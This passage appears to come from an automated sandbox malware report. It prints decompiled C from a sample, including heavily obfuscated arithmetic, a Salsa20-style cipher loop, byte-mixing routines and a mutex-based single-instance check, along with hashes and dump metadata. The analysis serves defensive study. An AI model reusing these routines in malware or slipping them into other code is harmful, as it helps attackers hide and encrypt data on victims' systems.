((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 
0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007) * 0x0000001b ^ _t342 * 0x0000001b ^ _v13 ^ 0x0000001b ^ _v7 ^ _v10 ^ _v12;
                                                                                    					_t519 = (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) + (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 
0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) >> 0x00000007 ^ 0x0000001b ^ (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) >> 0x00000020) * 0x0000001b ^ (((_t345 * 0x0000001b >> 
0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b;
                                                                                    					_t371 = _t519 * 0x1b;
                                                                                    					_t600 =  &(_t600[4]);
                                                                                    					 *(_t600 - 3) = _t519 ^ _t371 ^ _v13 ^ _v14 ^ _v9 ^ _v10 ^ _v12;
                                                                                    					_t599 = _t599 - 1;
                                                                                    				} while (_t599 != 0);
                                                                                    				return _t371;
                                                                                    			}


























                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                    • Instruction ID: e860a63083750337effb18e539a22bba23e2c33b801c9e422b930a4700f084e4
                                                                                    • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                    • Instruction Fuzzy Hash: 7BA1EA0A8090E4ABEF455A7E80B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                    • Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
                                                                                    • Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                    • Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 65%
                                                                                    			E0040BDC0(intOrPtr __ecx, intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				signed int _v52;
                                                                                    				char _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				signed int _v64;
                                                                                    				signed int _v68;
                                                                                    				signed int _v72;
                                                                                    				signed int _v76;
                                                                                    				signed int _v80;
                                                                                    				signed int _v84;
                                                                                    				signed int _v88;
                                                                                    				signed int _v92;
                                                                                    				signed int _v96;
                                                                                    				signed int _v100;
                                                                                    				signed int _v104;
                                                                                    				signed int _v108;
                                                                                    				signed int _v112;
                                                                                    				signed int _v116;
                                                                                    				signed int _v120;
                                                                                    				signed int _v124;
                                                                                    				signed int _t176;
                                                                                    				signed int _t207;
                                                                                    				signed int _t209;
                                                                                    				signed int _t215;
                                                                                    				signed int _t219;
                                                                                    				signed int _t225;
                                                                                    				signed int _t227;
                                                                                    				void* _t235;
                                                                                    				signed int _t238;
                                                                                    				signed int _t240;
                                                                                    				signed int _t241;
                                                                                    				signed int _t242;
                                                                                    				signed int _t244;
                                                                                    				signed int _t246;
                                                                                    				signed int _t248;
                                                                                    				signed int _t250;
                                                                                    				signed int _t252;
                                                                                    				signed int _t254;
                                                                                    				signed int _t255;
                                                                                    				signed int _t256;
                                                                                    				void* _t259;
                                                                                    				signed int _t261;
                                                                                    				signed int _t262;
                                                                                    				signed int _t270;
                                                                                    				signed int _t271;
                                                                                    				unsigned int _t272;
                                                                                    				signed int _t275;
                                                                                    				signed int _t276;
                                                                                    				intOrPtr _t277;
                                                                                    				signed int _t278;
                                                                                    				signed int _t279;
                                                                                    				signed int _t280;
                                                                                    				void* _t281;
                                                                                    				void* _t284;
                                                                                    
                                                                                    				_v56 = 0xa;
                                                                                    				_v60 = __ecx;
                                                                                    				asm("movdqu xmm0, [edi]");
                                                                                    				asm("movdqu [ebp-0x78], xmm0");
                                                                                    				asm("movdqu xmm0, [edi+0x10]");
                                                                                    				asm("movdqu [ebp-0x68], xmm0");
                                                                                    				asm("movdqu xmm0, [edi+0x20]");
                                                                                    				asm("movdqu [ebp-0x58], xmm0");
                                                                                    				asm("movdqu xmm0, [edi+0x30]");
                                                                                    				_t275 = _v80;
                                                                                    				_v8 = _v84;
                                                                                    				_v36 = _v88;
                                                                                    				_v24 = _v92;
                                                                                    				_v48 = _v96;
                                                                                    				_v44 = _v100;
                                                                                    				_v32 = _v104;
                                                                                    				_v20 = _v108;
                                                                                    				_v40 = _v112;
                                                                                    				asm("movdqu [ebp-0x48], xmm0");
                                                                                    				_t238 = _v76;
                                                                                    				_t261 = _v64;
                                                                                    				_t270 = _v68;
                                                                                    				_t278 = _v72;
                                                                                    				_v16 = _v116;
                                                                                    				_v12 = _v120;
                                                                                    				_t176 = _v124;
                                                                                    				_v52 = _t238;
                                                                                    				_v28 = _t176;
                                                                                    				do {
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_v20 = _v20 ^ _t176 + _t238;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_v24 = _v24 ^ _v20 + _v28;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t240 = _v52 ^ _v24 + _v20;
                                                                                    					_v52 = _t240;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v28 = _v28 ^ _v24 + _t240;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_v36 = _v36 ^ _v12 + _v32;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_t279 = _t278 ^ _v36 + _v32;
                                                                                    					_t241 = _v44;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_v12 = _v12 ^ _v36 + _t279;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v32 = _v32 ^ _v12 + _t279;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_t271 = _t270 ^ _v8 + _t241;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_v16 = _v16 ^ _v8 + _t271;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t242 = _t241 ^ _v16 + _t271;
                                                                                    					_v44 = _t242;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v8 = _v8 ^ _v16 + _t242;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_t244 = _v40 ^ _t275 + _t261;
                                                                                    					_v40 = _t244;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_t246 = _v48 ^ _t244 + _t261;
                                                                                    					_v48 = _t246;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t276 = _t275 ^ _v40 + _t246;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_t262 = _t261 ^ _t246 + _t276;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_v12 = _v12 ^ _v28 + _v40;
                                                                                    					_t207 = _v12;
                                                                                    					_v120 = _t207;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_v16 = _v16 ^ _t207 + _v28;
                                                                                    					_t209 = _v16;
                                                                                    					_v116 = _t209;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t248 = _v40 ^ _t209 + _v12;
                                                                                    					_v40 = _t248;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v112 = _t248;
                                                                                    					_t250 = _v28 ^ _v16 + _t248;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_v44 = _v44 ^ _v32 + _v20;
                                                                                    					_t215 = _v44;
                                                                                    					_v100 = _t215;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_v28 = _t250;
                                                                                    					_v124 = _t250;
                                                                                    					_t252 = _v48 ^ _t215 + _v32;
                                                                                    					_v48 = _t252;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_v20 = _v20 ^ _v44 + _t252;
                                                                                    					_t219 = _v20;
                                                                                    					_v108 = _t219;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v96 = _t252;
                                                                                    					_t254 = _v32 ^ _t219 + _t252;
                                                                                    					_v32 = _t254;
                                                                                    					_v104 = _t254;
                                                                                    					_t255 = _v36;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_t275 = _t276 ^ _v8 + _t255;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_v24 = _v24 ^ _v8 + _t275;
                                                                                    					_t225 = _v24;
                                                                                    					_v92 = _t225;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t256 = _t255 ^ _t225 + _t275;
                                                                                    					_t227 = _t256;
                                                                                    					_v36 = _t256;
                                                                                    					_v88 = _t227;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_v8 = _v8 ^ _t227 + _v24;
                                                                                    					_v84 = _v8;
                                                                                    					asm("rol eax, 0x7");
                                                                                    					_t238 = _v52 ^ _t262 + _t271;
                                                                                    					_v52 = _t238;
                                                                                    					_v76 = _t238;
                                                                                    					asm("rol eax, 0x9");
                                                                                    					_t278 = _t279 ^ _t262 + _t238;
                                                                                    					asm("rol eax, 0xd");
                                                                                    					_t270 = _t271 ^ _t278 + _t238;
                                                                                    					asm("ror eax, 0xe");
                                                                                    					_t261 = _t262 ^ _t270 + _t278;
                                                                                    					_t132 =  &_v56;
                                                                                    					 *_t132 = _v56 - 1;
                                                                                    					_t176 = _v28;
                                                                                    				} while ( *_t132 != 0);
                                                                                    				_v80 = _t275;
                                                                                    				_t235 = _a4 + 2;
                                                                                    				_t277 = _v60;
                                                                                    				_v64 = _t261;
                                                                                    				_v72 = _t278;
                                                                                    				_t280 = 0;
                                                                                    				_v68 = _t270;
                                                                                    				_t259 = _t277 -  &_v124;
                                                                                    				do {
                                                                                    					_t235 = _t235 + 4;
                                                                                    					 *(_t281 + _t280 * 4 - 0x78) =  *(_t281 + _t280 * 4 - 0x78) +  *((intOrPtr*)(_t281 + _t259 + _t280 * 4 - 0x78));
                                                                                    					_t272 =  *(_t281 + _t280 * 4 - 0x78);
                                                                                    					_t280 = _t280 + 1;
                                                                                    					 *((char*)(_t235 - 5)) = _t272 >> 8;
                                                                                    					 *(_t235 - 6) = _t272;
                                                                                    					 *((char*)(_t235 - 4)) = _t272 >> 0x10;
                                                                                    					 *((char*)(_t235 - 3)) = _t272 >> 0x18;
                                                                                    					_t284 = _t280 - 0x10;
                                                                                    				} while (_t284 < 0);
                                                                                    				 *((intOrPtr*)(_t277 + 0x20)) =  *((intOrPtr*)(_t277 + 0x20)) + 1;
                                                                                    				 *((intOrPtr*)(_t277 + 0x24)) =  *((intOrPtr*)(_t277 + 0x24));
                                                                                    				return 0 | _t284 == 0x00000000;
                                                                                    			}




































































                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00420F30(signed int _a4, signed char _a8, intOrPtr _a12) {
                                                                                    				intOrPtr _t13;
                                                                                    				void* _t14;
                                                                                    				signed char _t20;
                                                                                    				signed char _t24;
                                                                                    				signed int _t27;
                                                                                    				signed char _t32;
                                                                                    				unsigned int _t33;
                                                                                    				signed char _t35;
                                                                                    				signed char _t37;
                                                                                    				signed int _t39;
                                                                                    
                                                                                    				_t13 = _a12;
                                                                                    				if(_t13 == 0) {
                                                                                    					L11:
                                                                                    					return _t13;
                                                                                    				} else {
                                                                                    					_t39 = _a4;
                                                                                    					_t20 = _a8;
                                                                                    					if((_t39 & 0x00000003) == 0) {
                                                                                    						L5:
                                                                                    						_t14 = _t13 - 4;
                                                                                    						if(_t14 < 0) {
                                                                                    							L8:
                                                                                    							_t13 = _t14 + 4;
                                                                                    							if(_t13 == 0) {
                                                                                    								goto L11;
                                                                                    							} else {
                                                                                    								while(1) {
                                                                                    									_t24 =  *_t39;
                                                                                    									_t39 = _t39 + 1;
                                                                                    									if((_t24 ^ _t20) == 0) {
                                                                                    										goto L20;
                                                                                    									}
                                                                                    									_t13 = _t13 - 1;
                                                                                    									if(_t13 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L11;
                                                                                    									}
                                                                                    									goto L24;
                                                                                    								}
                                                                                    								goto L20;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                                                                                    							do {
                                                                                    								_t27 =  *_t39 ^ _t20;
                                                                                    								_t39 = _t39 + 4;
                                                                                    								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                                                                                    									goto L12;
                                                                                    								} else {
                                                                                    									_t32 =  *(_t39 - 4) ^ _t20;
                                                                                    									if(_t32 == 0) {
                                                                                    										return _t39 - 4;
                                                                                    									} else {
                                                                                    										_t33 = _t32 ^ _t20;
                                                                                    										if(_t33 == 0) {
                                                                                    											return _t39 - 3;
                                                                                    										} else {
                                                                                    											_t35 = _t33 >> 0x00000010 ^ _t20;
                                                                                    											if(_t35 == 0) {
                                                                                    												return _t39 - 2;
                                                                                    											} else {
                                                                                    												if((_t35 ^ _t20) == 0) {
                                                                                    													goto L20;
                                                                                    												} else {
                                                                                    													goto L12;
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L24;
                                                                                    								L12:
                                                                                    								_t14 = _t14 - 4;
                                                                                    							} while (_t14 >= 0);
                                                                                    							goto L8;
                                                                                    						}
                                                                                    					} else {
                                                                                    						while(1) {
                                                                                    							_t37 =  *_t39;
                                                                                    							_t39 = _t39 + 1;
                                                                                    							if((_t37 ^ _t20) == 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t13 = _t13 - 1;
                                                                                    							if(_t13 == 0) {
                                                                                    								goto L11;
                                                                                    							} else {
                                                                                    								if((_t39 & 0x00000003) != 0) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									goto L5;
                                                                                    								}
                                                                                    							}
                                                                                    							goto L24;
                                                                                    						}
                                                                                    						L20:
                                                                                    						return _t39 - 1;
                                                                                    					}
                                                                                    				}
                                                                                    				L24:
                                                                                    			}














                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction ID: 4d4153effdc54993d1d24102320792f46c30032caadd031e430906af4f03bf0d
                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction Fuzzy Hash: 191178773C10B143D634CA2DF6B46F7A3E5EFC5320BAF43ABD0418B756D2AAA8419508
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E0040A660(void* __ecx) {
                                                                                    				signed int _v5;
                                                                                    				signed int _v6;
                                                                                    				signed int _v7;
                                                                                    				signed char _t62;
                                                                                    				signed char _t65;
                                                                                    				signed char _t66;
                                                                                    				void* _t69;
                                                                                    				signed char _t70;
                                                                                    				signed char _t72;
                                                                                    				unsigned char _t88;
                                                                                    				void* _t92;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_t69 = __ecx + 2;
                                                                                    				_t92 = 4;
                                                                                    				do {
                                                                                    					_t70 =  *((intOrPtr*)(_t69 + 1));
                                                                                    					_t69 = _t69 + 4;
                                                                                    					_t72 = _t70 ^  *(_t69 - 4);
                                                                                    					_t65 =  *(_t69 - 5);
                                                                                    					_v6 = 0x1b;
                                                                                    					_v7 = _t72;
                                                                                    					_v5 = _t72 ^ 0x0000001b ^ _t65;
                                                                                    					 *(_t69 - 6) = 0x0000001b ^ ((0x0000001b ^ _t65) >> 0x00000007) * ((0x0000001b ^ _t65) >> 0x00000007) >> 0x00000020 ^ _v6 ^ _v5;
                                                                                    					_t66 = _v5;
                                                                                    					 *(_t69 - 5) = ((_t65 ^ _t65) >> 0x00000007) * 0x0000001b ^ ((_t65 ^ _t65) >> 0x00000007) * ((_t65 ^ _t65) >> 0x00000007) >> 0x00000020 ^ _t65 ^ _t66;
                                                                                    					_t88 = _v7 ^ _v6;
                                                                                    					 *(_t69 - 4) = 0x0000001b ^ _t88 ^ _t66 ^ _t66;
                                                                                    					_t62 = (_t88 >> 0x00000007) * 0x0000001b ^ (_t88 >> 0x00000007) * (_t88 >> 0x00000007) >> 0x00000020 ^ _v7 ^ _t66;
                                                                                    					 *(_t69 - 3) = _t62;
                                                                                    					_t92 = _t92 - 1;
                                                                                    				} while (_t92 != 0);
                                                                                    				return _t62;
                                                                                    			}















                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                    • Instruction ID: 12798de650c464c34aa3778ce5e64fe04281c395c40e5146a0d3500761537530
                                                                                    • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                    • Instruction Fuzzy Hash: 7E113D0A8492C4BDCF424A7840E56EBEFA58E37218F4A71DA88C45B753D01B190FE7A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 87%
                                                                                    			E004124E0() {
                                                                                    				long _v8;
                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                    				struct _STARTUPINFOA _v100;
                                                                                    				char _v364;
                                                                                    				char _v628;
                                                                                    				void _v1668;
                                                                                    				char _v1932;
                                                                                    				char _v2956;
                                                                                    				long _t40;
                                                                                    				signed int _t48;
                                                                                    				void* _t78;
                                                                                    				intOrPtr _t79;
                                                                                    				int _t104;
                                                                                    				long _t106;
                                                                                    				int _t108;
                                                                                    				void* _t110;
                                                                                    				intOrPtr* _t113;
                                                                                    				void* _t115;
                                                                                    
                                                                                    				if( *0x513234 == 0) {
                                                                                    					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
                                                                                    					_t40 = GetLastError();
                                                                                    					_push( *0x513230);
                                                                                    					if(_t40 != 0xb7) {
                                                                                    						CloseHandle();
                                                                                    						 *0x513230 = 0;
                                                                                    						goto L7;
                                                                                    					} else {
                                                                                    						_t104 = CloseHandle();
                                                                                    						 *0x513230 = 0;
